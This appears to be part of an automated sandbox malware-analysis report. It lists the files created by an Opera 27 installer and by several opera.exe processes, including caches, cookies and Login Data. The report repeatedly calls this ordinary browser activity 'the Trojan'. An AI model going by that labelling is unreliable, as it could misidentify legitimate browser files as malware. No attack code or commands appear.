C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\af.pak (121 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\files_list (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\opera.pak (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\bn.pak (270 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139.log (30173 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\en-GB.pak (113 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\libGLESv2.dll (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\resources\0CD5F3A0-8BF6-11E2-9E96-0800200C9A66.ico (17 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\ja.pak (160 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\resources\2F8F0E41-F521-45A4-9691-F664AFAFE67F.ico (17 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\Assets\150x150Logo.scale-140.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E4F76C0C82655FD6506668127FA0ACD1_F6AB1C86FB0C74897AC7F2CB403CFB96 (1640 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\pt-PT.pak (128 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\ms.pak (122 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\Assets\150x150Logo.scale-80_contrast-white.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\osmesa.dll (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\opera_100_percent.pak (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\it.pak (129 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\te.pak (274 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\lt.pak (128 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\opera_autoupdate.exe (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3BB9C1BA2D19E090AE305B2683903A0_6E9A9670139B949E0946278E14EB2FC8 (1536 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\fy.pak (121 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\bg.pak (194 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\Assets\70x70Logo.scale-80_contrast-white.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\resources (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\Assets\150x150Logo.scale-180_contrast-white.png (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\message_center_win8.dll (157 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\Assets\150x150Logo.scale-180.png (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EDC238BFF48A31D55A97E1E93892934B_C20E0DA2D0F89FE526E1490F4A2EE5AB (471 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\opera_125_percent.pak (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\Assets\70x70Logo.scale-100.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\resources\FF57F01A-0718-44B7-8A1F-8B15BC33A50B.ico (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\kk.pak (185 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\ta.pak (296 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\pt-BR.pak (128 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\installer.exe (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\resources\8D754F20-8BF5-11E2-9E96-0800200C9A66.ico (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\vi.pak (147 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\msvcr100.dll (774 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\Assets\150x150Logo.scale-140_contrast-white.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\resources\C665D993-1B49-4C2E-962C-BEB19993BB86.ico (17 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\sr.pak (188 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\es-419.pak (131 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EDC238BFF48A31D55A97E1E93892934B_C20E0DA2D0F89FE526E1490F4A2EE5AB (1592 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\msvcp100.dll (421 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\ru.pak (192 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\resources\CFD4BE41-4C6D-496A-ADDB-4095DFA1DD0E.ico (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\sw.pak (122 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\sk.pak (125 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\cs.pak (130 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\resources\default_partner_content.json (258 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\8D41.tmp (134 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\resources\3B6191A0-8BF3-11E2-9E96-0800200C9A66.ico (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\gd.pak (141 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139.exe (16260652 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\launcher_lib.dll (553 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\id.pak (118 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\hu.pak (135 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 (680 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\opera.dll (109 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\Assets\150x150Logo.scale-80.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\Opera_27.0.1689.69_Setup[1].exe (15995994 bytes)

The process opera.exe:3924 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files% (x86)\Opera\27.0.1689.69\pdf.dll (2183 bytes)

The process opera.exe:3144 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Jump List Icons\6831.tmp (56 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Local Storage\http_go.mail.ru_0.localstorage (154 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\000F7F8FAB2D96E6F8CBD5C9A3B4EC90 (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Bookmarks.bak (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\History-journal (3084 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Sync Extension Settings\knohfebhibeknbfioecpdmdkjkjdnjnl\000005.ldb (238 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\4463.tmp (750 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\thumbnails.db-journal (23128 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\4466.tmp (3906 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DS2ZTCIE4KNSH4V607JD.temp (1444 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Jump List Icons\685B.tmp (56 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\943E.tmp (28 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\444F.tmp (752 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1B1F4BA66CDBFEC85A20E11BF729AF23_875737CF3E2CD0CAED4F83BDCD5EF412 (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\session.db (2112 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\etilqs_kQsciBiKuEIL842 (172 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extension Rules\LOG (236 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Cookies (9254 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Opera Software\Opera Stable\Cache\index (368 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\etilqs_Sp9QxhhjcY7lZWN (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1B1F4BA66CDBFEC85A20E11BF729AF23_875737CF3E2CD0CAED4F83BDCD5EF412 (1536 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Opera Software\Opera Stable\Cache\f_000010 (68 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extension Rules\000004.dbtmp (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Sync Extension Settings\knohfebhibeknbfioecpdmdkjkjdnjnl\000004.dbtmp (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Favicons (9026 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Web Data (156 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\000F7F8FAB2D96E6F8CBD5C9A3B4EC90 (344 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\4464.tmp (10174 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extension Rules\MANIFEST-000004 (69 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Opera Software\Opera Stable\Cache\f_00000e (45 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Opera Software\Opera Stable\Cache\f_00000d (22 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Sync Extension Settings\knohfebhibeknbfioecpdmdkjkjdnjnl\MANIFEST-000004 (227 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Opera Software\Opera Stable\Cache\f_00000f (55 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Opera Software\Opera Stable\Cache\f_00000a (75 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Opera Software\Opera Stable\Cache\f_00000c (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Opera Software\Opera Stable\Cache\f_00000b (41 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Opera Software\Opera Stable\Cache\data_3 (5992 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Opera Software\Opera Stable\Cache\data_2 (6344 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Opera Software\Opera Stable\Cache\data_1 (167256 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Opera Software\Opera Stable\Cache\data_0 (620200 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\History Provider Cache (676 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\4460.tmp (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\6284.tmp (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Opera Software\Opera Stable\Cache\f_000004 (19 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Sync Extension Settings\knohfebhibeknbfioecpdmdkjkjdnjnl\LOG (470 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Jump List Icons\6843.tmp (56 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Web Data-journal (5450 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\6235.tmp (24 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Jump List Icons\6845.tmp (56 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\4465.tmp (4482 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Jump List Icons\6859.tmp (56 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Opera Software\Opera Stable\Cache\f_000006 (86 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Local Storage\http_go.mail.ru_0.localstorage-journal (5114 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extension State\MANIFEST-000004 (69 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\session.db-journal (5739 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Favicons-journal (37748 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Opera Software\Opera Stable\old_Cache_000 (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\etilqs_pi86MUhJVCxtBpT (19820 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Local Storage\http_s7.addthis.com_0.localstorage-journal (576 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Opera Software\Opera Stable\Cache\f_000005 (30 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extension State\000004.dbtmp (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Opera Software\Opera Stable\Cache\f_000007 (72 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\favorites.db (776 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Opera Software\Opera Stable\Cache\f_000001 (26 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Opera Software\Opera Stable\Cache\f_000003 (26 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Opera Software\Opera Stable\Cache\f_000002 (26 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Local Storage\http_s7.addthis.com_0.localstorage (77 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Jump List Icons\686C.tmp (56 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Opera Software\Opera Stable\Cache\f_000009 (49 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\favorites.db-journal (2930 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\62C3.tmp (755 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\40EB206A466C1F1175CCB23E825B3250 (805 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Cookies-journal (29673 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\4461.tmp (750 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\4462.tmp (749 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\session.dbak (1202 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Jump List Icons\6847.tmp (56 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\4467.tmp (1929 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extension State\000006.log (1682 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extension State\LOG (466 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\40EB206A466C1F1175CCB23E825B3250 (824 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\thumbnails.db (18800 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Opera Software\Opera Stable\Cache\f_000008 (135 bytes)

The process opera.exe:3464 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extension State\000002.dbtmp (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Local Storage\chrome-extension_knohfebhibeknbfioecpdmdkjkjdnjnl_0.localstorage (154 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\dictionaries\dictionaries.xml (11 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Jump List Icons\DB2A.tmp (56 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Opera Software\Opera Stable\Cache\index (368 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\828298824EA5549947C17DDABF6871F5_4A500E9AA7C5573906560F21D53A5861 (1312 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\82414F9D7AB8999991FFEB2BC378A4EB_0B35E6FFBFE4E15ABA5FF0BD5F80BF61 (1624 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Favicons (9626 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\8025.tmp (261 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\thumbnails.db-journal (18464 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Sync Extension Settings\knohfebhibeknbfioecpdmdkjkjdnjnl\MANIFEST-000002 (69 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Jump List Icons\DB12.tmp (56 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Sync Extension Settings\knohfebhibeknbfioecpdmdkjkjdnjnl\MANIFEST-000001 (41 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Opera Software\Opera Stable\Cache\data_3 (11576 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Opera Software\Opera Stable\Cache\data_2 (3512 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Opera Software\Opera Stable\Cache\data_1 (60880 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Opera Software\Opera Stable\Cache\data_0 (106500 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\opera_autoupdate.exe (146 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Sync Extension Settings\knohfebhibeknbfioecpdmdkjkjdnjnl\LOG (47 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CA7B2D59B4E9BC2D316D1AECDFC12F63_13131049604DA2DEFB9E5743B33A97AE (1520 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8059E9A0D314877E40FE93D8CCFB3C69_7DB2F61065E9C4FD781EBAB61B9C4C32 (463 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\etilqs_UOq4DcKjuYo2ups (536 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\stash.db-journal (576 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Opera Software\Opera Stable\Cache\f_000001 (112 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3559FD17375EFB765B4E3F23EFB797BB_A97E655B4CB86332E976B7C8B2FDE28E (1624 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Opera Software\Opera Stable\Cache\f_000003 (38 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Opera Software\Opera Stable\Cache\f_000002 (29 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Top Sites-journal (576 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\23B523C9E7746F715D33C6527C18EB9D (856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\8026.tmp (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873 (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\200L4C4BCKNRZ2I6NNR0.temp (1444 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Certificate Revocation Lists (261 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8059E9A0D314877E40FE93D8CCFB3C69_7DB2F61065E9C4FD781EBAB61B9C4C32 (1432 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B176.tmp (750 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extension State\000003.log (323 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\EDF2.tmp (21 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\etilqs_eupF8t4pFU9MicN (19820 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Login Data (734 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873 (1496 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\stash.db (8716 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Cookies (10088 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extension Rules\000001.dbtmp (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Web Data (10287 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\etilqs_R4ezmPGRCg7ignU (3980 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Visited Links (450 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CA7B2D59B4E9BC2D316D1AECDFC12F63_9747E3D3BF33A110ABC7B91BEE5A070A (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\etilqs_JjSfCEfbRFB3t6C (290 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\session.dbak (601 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B165.tmp (3747 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CA7B2D59B4E9BC2D316D1AECDFC12F63_9747E3D3BF33A110ABC7B91BEE5A070A (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CA7B2D59B4E9BC2D316D1AECDFC12F63_13131049604DA2DEFB9E5743B33A97AE (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3559FD17375EFB765B4E3F23EFB797BB_A97E655B4CB86332E976B7C8B2FDE28E (471 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\828298824EA5549947C17DDABF6871F5_4A500E9AA7C5573906560F21D53A5861 (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\BB3E.tmp (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7D266D9E1E69FA1EEFB9699B009B34C8_8CA7164968F366C9A94AC8E71C4BDD9B (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Sync Extension Settings\knohfebhibeknbfioecpdmdkjkjdnjnl\000003.log (56 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extension State\MANIFEST-000002 (69 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extension State\MANIFEST-000001 (41 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\BAE0.tmp (545 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_11D7BA58D75E54D622A3AD9CDF9905BB (1624 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Local Storage\opera_startpage_0.localstorage (154 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\opera_crashreporter.exe (552 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\82414F9D7AB8999991FFEB2BC378A4EB_0B35E6FFBFE4E15ABA5FF0BD5F80BF61 (471 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_11D7BA58D75E54D622A3AD9CDF9905BB (471 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extension State\LOG (47 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\etilqs_fXYZZRPYBkbMuMr (135 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Local Storage\opera_startpage_0.localstorage-journal (5114 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\9E60.tmp (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B17A.tmp (3003 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Sync Extension Settings\knohfebhibeknbfioecpdmdkjkjdnjnl\000001.dbtmp (20 bytes)
